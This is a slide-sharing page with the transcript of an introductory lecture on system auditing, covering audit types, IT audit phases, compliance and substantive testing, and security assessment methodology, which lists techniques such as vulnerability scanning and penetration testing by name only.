7-Oct-15 System Auditing. AUDITING Auditing is a systematic process of objectively obtaining and evaluating evidence regarding assertions about economic.

Slides:



Advertisements
Similar presentations
AUDITING : AN OVERVIEW. Auditing defined It is a critical and systematic examination or review of accounting reports, documents, records, procedures and.
Advertisements

IT Web Application Audit Principles Presented by: James Ritchie, CISA, CISSP….
Information System Audit : © South-Asian Management Technologies Foundation Chapter 4: Information System Audit Requirements.
ITAuditing Using GAS & CAATs
Overview of IS Controls, Auditing, and Security Fall 2005.
Auditing Concepts.
©2003 Prentice Hall Business Publishing, Accounting Information Systems, 9/e, Romney/Steinbart 10-1 Accounting Information Systems 9 th Edition Marshall.
Learning Objectives LO1 Explain the importance of auditing. LO2 Distinguish auditing from accounting. LO3 Explain the role of auditing in information risk.
Sodexo.com Group Internal Audit. page 2 helps an organization accomplish its objectives by bringing a systematic, disciplined approach to evaluate and.
Auditing Computer Systems
Auditing Computer-Based Information Systems
The Islamic University of Gaza
Audit Guidance Using the Federal Information System Controls Audit Manual (FISCAM) to Achieve Audit Objectives in Financial and Performance Audits Mickie.
Information Security Policies and Standards
Chapter 7 Control and AIS Copyright © 2012 Pearson Education, Inc. publishing as Prentice Hall 7-1.
Pertemuan 5-6 Matakuliah: A0214/Audit Sistem Informasi Tahun: 2007.
Planning the Audit; Linking Audit Procedures to Risk
Network Security Testing Techniques Presented By:- Sachin Vador.
Review of Introduction to Auditing
9.401 Auditing Chapter 1 Introduction. Definition of Auditing The accumulation and evaluation The accumulation and evaluation Of evidence about information.
AUDITING INFORMATION TECHNOLOGY USING COMPUTER ASSISTED AUDIT TOOLS AND TECHNIQUES.
Advanced Accounting Information Systems
Pertemuan Matakuliah: A0214/Audit Sistem Informasi Tahun: 2007.
Office of Inspector General (OIG) Internal Audit
The Information Systems Audit Process
1 Performance Auditing  In IT Environment  Evidence Gathering & Analysis Techniques  Computer Assisted Techniques  Use of IDEA.
INTERNAL CONTROL OVER FINANCIAL REPORTING
Auditing & Assurance Services, 6e
D-1 McGraw-Hill/Irwin ©2005 by the McGraw-Hill Companies, Inc. All rights reserved. Module D Internal, Governmental, and Fraud Audits “I predict that audit.
Planning an Audit The Audit Process consists of the following phases:
INFORMATION ASSURANCE USING C OBI T MEYCOR C OBI T CSA & MEYCOR C OBI T AG TOOLS.
INTERNAL CONTROL OVER FINANCIAL REPORTING
Chapter Three IT Risks and Controls.
Chapter 5 Internal Control over Financial Reporting
Internal Control in a Financial Statement Audit
Chapter 1 Assurance Services. Need for Assurance Why do you need assurance? Potential bias in providing information. Remoteness between a user and the.
Important acronyms AO = authorizing official ISO = information system owner CA = certification agent.
1. IT AUDITS  IT audits: provide audit services where processes or data, or both, are embedded in technologies.  Subject to ethics, guidelines, and.
Evaluation of Internal Control System
Auditing Information Systems (AIS)
Understanding the IT environment of the entity. Session objectives Defining contours of financial accounting in an IT environment and its characteristics.
S4: Understanding the IT environment of the entity.
Disaster Recover Planning & Federal Information Systems Management Act Requirements December 2007 Central Maryland ISACA Chapter.
Pengauditan (Auditing) What is auditing? Auditing is a systematic process of objectively obtaining and evaluating evidence regarding assertions about.
Engineering Essential Characteristics Security Engineering Process Overview.
1 Chapter Nine Conducting the IT Audit Lecture Outline Audit Standards IT Audit Life Cycle Four Main Types of IT Audits Using COBIT to Perform an Audit.
Copyright © 2013 by The McGraw-Hill Companies, Inc. All rights reserved.McGraw-Hill/Irwin.
Internal Controls Christina Urias Managing Director – International Regulatory Affairs NAIC.
IS 630 : Accounting Information Systems Auditing Computer-based Information Systems Lecture 10.
Security Environment Assessment. Outline  Overview  Key Sources and Participants  General Findings  Policy / Procedures  Host Systems  Network Components.
Session 1.31 RISK BASED AUDITING AN OVERVIEW BY R T I JAIPUR.
Audit Evidence Process
Chapter 8-1 Chapter 8 Accounting Information Systems Information Technology Auditing Dr. Hisham madi.
Chapter 3-Auditing Computer-based Information Systems.
Copyright © 2015 McGraw-Hill Education. All rights reserved. No reproduction or distribution without the prior written consent of McGraw-Hill Education.
Internal Audit Section. Authorized in Section , Florida Statutes Section , Florida Statutes (F.S.), authorizes the Inspector General to review.
Important acronyms AO = authorizing official ISO = information system owner CA = certification agent.
INFORMATION ASSURANCE POLICY. Information Assurance Information operations that protect and defend information and information systems by ensuring their.
Risk Assessments in Many Flavors George J. Dolicker, CISA, CISSP.
Chapter 6 Internal Control in a Financial Statement Audit McGraw-Hill/IrwinCopyright © 2012 by The McGraw-Hill Companies, Inc. All rights reserved.
Governance, Risk and Ethics. 2 Section A: Governance and responsibility Section B: Internal control and review Section C: Identifying and assessing risk.
Defining your requirements for a successful security (and compliance
Auditing Concepts.
Internal Control Principles
CPA Gilberto Rivera, VP Compliance and Operational Risk
Chapter 1 An Introduction to Assurance and Financial Statement Auditing.
Chapter 9 Control, security and audit
Internal Control Internal control is the process designed and affected by owners, management, and other personnel. It is implemented to address business.
Information Technology Auditing
Tools and Techniques for the Auditor: Fieldwork
Presentation transcript:

7-Oct-15 System Auditing

AUDITING Auditing is a systematic process of objectively obtaining and evaluating evidence regarding assertions about economic actions and events ascertain the degree of correspondence between those assertions communicating the results to interested users.

Types of Audits  Financial Audit  Operational Audit  Compliance Audit  Fraud Audit  IT Audit  Security Audit  Can be done both internally or externally by the public certified accountants

IT Audit An information technology audit, or information systems audit, is an examination of the controls within an Information technology (IT) infrastructure. An IT audit is the process of collecting and evaluating evidence of an organization's information systems, practices, and operations.

IT Audit The evaluation of obtained evidence determines if the information systems are safeguarding assets, maintaining data integrity, and operating effectively and efficiently to achieve the organization's goals or objectives. This is becoming increasing important as accounting data and the processes are now embedded into the computer based information system

IT Audit  Subject to ethics, guidelines, and standards of the profession (if certified)  CISA  Most closely associated with ISACA  Joint with internal, external, and fraud audits  Scope of IT audit coverage is increasing  Characterized by CAATTs  IT governance as part of corporate governance

Stages of IT Audit Phases 1. Planning 2. Obtaining evidence  Tests of Controls  Substantive Testing  CAATTs  Analytical procedures 3. Ascertaining reliability  MATERIALITY 4. Communicating results  Audit opinion

IT Audit Approach Gather information and Plan Knowledge of business and industry Prior year ‘s audit result Recent financial informationRegulatory statutes Inherent risk assessments Obtain understanding of internal control Control environmentControl procedures Control risk assessmentDetection risk assessment Total risks

IT Audit Approach Perform compliance tests Test policies and proceduresTest segregation of duties Perform substantive tests Analytical proceduresDetailed tests of account balances Other substantive audit procedures Conclude the audit Create recommendationWrite audit report

Tests performed Compliance testing To determine if internal controls are being applied in a manner described in documentation and in accordance with management intent Substantive testing To determine the integrity of the actual processing. Usually done by processed some sample data and see if the same result can be realized.

Security Audit It is a systematic, measurable technical assessment of: how the organization's security policy is employed at a specific site How effectively an entity being assessed meets specific security objectives

Assessment Methodology Should be repeatable and documented Divided into 3 phases: Planning Set goals, scope, timeline, responsibility, resources, deliverables Collect information: assets to be assessed, threats against assets, security controls to mitigate risk Execution Validate controls and identify vulnerabilities Post-execution

Assessment Methodology Post-execution Analyse identified vulnerabilities Determine root cause Recommend mitigation methods Write final report

Assessment methods Examine/review Technical investigation/assessment Interview

Review techniques Documentation review – policies, procedures Log review Rule set review – router, firewall, IDS etc. System configuration review Network sniffing – network traffic File integrity checking

Technical assessment techniques Network discovery Network port and services identification Vulnerability scanning Wireless scanning etc. Password cracking Penetration testing Social engineering

Talk to /interview people Have they read the security policy? What can/ can’t do in their own words? Could they get root/ system privilege? What are the systems used for? What are the critical systems? How do they view the security audit?

Terminology CAATT: Computer Assisted Auditing Tool and Techniques ACL: Audit Command Language IDEAS: Interactive Data Extraction and Analysis Ref on Security Audit: NIST Technical guide to Information Security Testing and Assessment

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.